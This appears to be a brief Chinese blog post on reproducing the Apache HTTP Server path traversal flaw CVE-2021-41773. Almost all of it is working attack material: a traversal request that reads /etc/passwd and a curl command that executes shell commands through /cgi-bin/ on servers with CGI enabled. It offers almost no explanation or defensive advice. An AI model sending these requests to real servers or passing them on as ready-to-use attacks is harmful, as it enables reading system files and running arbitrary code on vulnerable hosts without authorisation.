当前位置: 代码迷 >> 综合 >> Apache CVE-2021-41773 复现
  详细解决方案

Apache CVE-2021-41773 复现

热度:12   发布时间:2023-10-28 17:51:05.0

CVE-2021-41773

poc: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

但是近期国外的师傅研究出了直接RCE的方法,Payload如下:

curl --data "A=|id>/tmp/x" 'URL/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

如果想要进行RCE的话就要开启CGI。

  相关解决方案